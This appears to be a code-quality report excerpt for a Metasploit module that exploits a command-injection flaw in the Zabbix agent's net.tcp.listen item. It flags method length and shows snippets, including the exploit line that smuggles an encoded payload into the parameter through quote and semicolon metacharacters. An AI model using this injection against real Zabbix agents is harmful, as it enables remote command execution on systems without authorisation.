modules/exploits/unix/misc/zabbix_agent_exec.rb
Method initialize
has 40 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info = {})
super(update_info(info,
'Name' => 'Zabbix Agent net.tcp.listen Command Injection',
'Description' => %q{
This module exploits a metacharacter injection vulnerability
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
connect
rnd_port = rand(1024) + 1
buf = "net.tcp.listen[#{rnd_port}';#{payload.encoded};']\n"